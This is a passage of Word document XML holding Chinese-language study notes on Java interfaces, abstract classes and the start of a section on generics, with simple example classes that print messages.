    <w:p w14:paraId="5D1FC60F" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FE0917" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF7073" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>abstract LandAnimal implements Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779D55A" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FAB4FC" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public void breather ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE18D7" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0BBC28" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   System.out.println("LandAnimal is breathing");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E3262" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001FAA27" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CF57C2" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Student extends Person implements Runner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02669329" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34283A0D" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647DA5F" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public void run ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D912A3C" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DEA5C" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("the student is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E4857E" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E203D9" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BA63D6" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7494F7EF" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>interface Flyer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F87AF2" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049157C8" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  void fly ();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E13A2B" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19816B66" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Bird implements Runner , Flyer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501F17D" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699FC30" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public void run ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C849E" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2890AB" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       System.out.println("the bird is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1142BFD9" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6A57F" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public void fly ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C7E5C9" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC71209" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       System.out.println("the bird is flying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620B97B8" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C84D60" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D4C6B" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class TestFish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C79781E" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01E92B" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public static void main (String args[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B0165" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7551534F" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      Fish f = new Fish();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF5F2D0" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      int j = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570EBCE" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      j = Runner.ID;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48131A4C" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      j = f.ID;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4B4FF" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277043E" w14:textId="240056E2" w:rsidR="0048352F" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCA379" w14:textId="33A8284F" w:rsidR="0048352F" w:rsidRDefault="0048352F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551F1FE3" w14:textId="2617225B" w:rsidR="0048352F" w:rsidRDefault="0048352F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A54039" w14:textId="0B9D8DB2" w:rsidR="0048352F" w:rsidRDefault="0048352F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3651A7FA" w14:textId="77777777" w:rsidR="0048352F" w:rsidRDefault="0048352F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED58A79" w14:textId="412E1F5F" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21764A11" w14:textId="52043DC0" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C1C4D9" w14:textId="77777777" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761B1A25" w14:textId="77777777" w:rsidR="0002471C" w:rsidRPr="0002471C" w:rsidRDefault="0002471C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11984350" w14:textId="2CF02F30" w:rsidR="004B47C0" w:rsidRDefault="004B47C0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>nterface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F75FDE" w14:textId="04D9FAA6" w:rsidR="004B47C0" w:rsidRDefault="004B47C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="004B47C0">
        <w:t>https://www.runoob.com/java/java-interfaces.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E349D" w14:textId="32854ADF" w:rsidR="004B47C0" w:rsidRDefault="004B47C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6D41E0" w14:textId="60FBDDA2" w:rsidR="00943AD8" w:rsidRDefault="00943AD8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为接口的方法相同，</w:t>
      </w:r>
      <w:r w:rsidRPr="00943AD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00943AD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00943AD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程语言中是一个抽象类型，是抽象方法的集合，接口通常以</w:t>
      </w:r>
      <w:r w:rsidRPr="00943AD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00943AD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来声明。一个类通过继承接口的方式，从而来继承接口的抽象方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39726BDD" w14:textId="77777777" w:rsidR="00361699" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170D561F" w14:textId="77777777" w:rsidR="00361699" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口（英文：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程语言中是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>抽象类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是抽象方法的集合，接口通常以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来声明。</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个类通过继承接口的方式，从而来继承接口的抽象方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADB275" w14:textId="77777777" w:rsidR="00361699" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A4327C" w14:textId="77777777" w:rsidR="00361699" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口并不是类，编写接口的方式和类很相似，但是它们属于不同的概念。类描述对象的属性和方法。接口则包含类要实现的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D317BD0" w14:textId="77777777" w:rsidR="00361699" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E67C051" w14:textId="77777777" w:rsidR="00361699" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>除非</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实现接口的类</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>抽象类</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，否则</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>该类要定义接口中的所有方法</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49B0AE" w14:textId="697E3946" w:rsidR="00361699" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A682658" w14:textId="747A94A7" w:rsidR="000D7BAE" w:rsidRDefault="000D7BAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类实现的方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口定义的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E4EEE" w14:textId="77777777" w:rsidR="000D7BAE" w:rsidRDefault="000D7BAE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4607738C" w14:textId="5F0BC11A" w:rsidR="00FC61AB" w:rsidRDefault="00361699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口无法被实例化，但是可以被实现。</w:t>
      </w:r>
      <w:r w:rsidRPr="007515FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个实现接口的类，必须实现接口内所描述的所有方法，否则就必须声明为抽象类。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，接口类型可用来声明一个变量，他们可以成为一个空指针，或是被绑定在一个以此接口实现的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46422156" w14:textId="7205AFE3" w:rsidR="00FC61AB" w:rsidRDefault="00FC61AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F399AE3" w14:textId="3FF7E762" w:rsidR="00FC61AB" w:rsidRDefault="00FC61AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24746A2D" w14:textId="549C5096" w:rsidR="00FC61AB" w:rsidRDefault="00CE036E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FA432" w14:textId="778F14C2" w:rsidR="004B47C0" w:rsidRDefault="004B47C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471C43F2" w14:textId="54998FB7" w:rsidR="0079055B" w:rsidRDefault="0079055B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我个人感觉，泛型接近于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口概念。</w:t>
      </w:r>
      <w:r w:rsidR="00F7162D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如让一个方法可以接受不同类型的参数，比如</w:t>
      </w:r>
      <w:r w:rsidR="00F7162D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidR="00F7162D">
        <w:t>(string) List(Number)</w:t>
      </w:r>
      <w:r w:rsidR="00F7162D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782488B1" w14:textId="77777777" w:rsidR="0079055B" w:rsidRDefault="0079055B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F82C36" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以写一个泛型方法，该方法在调用时可以接收不同类型的参数。根据传递给泛型方法的参数类型，编译器适当地处理每一个方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4D5C7" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414A1C0B" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是定义泛型方法的规则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322A949" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C546CF" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有泛型方法声明都有一个类型参数声明部分（由尖括号分隔），该类型参数声明部分在方法返回类型之前（在下面例子中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;E&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723A659D" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每一个类型参数声明部分包含一个或多个类型参数，参数间用逗号隔开。一个泛型参数，也被称为一个类型变量，是用于指定一个泛型类型名称的标识符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45591FF6" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
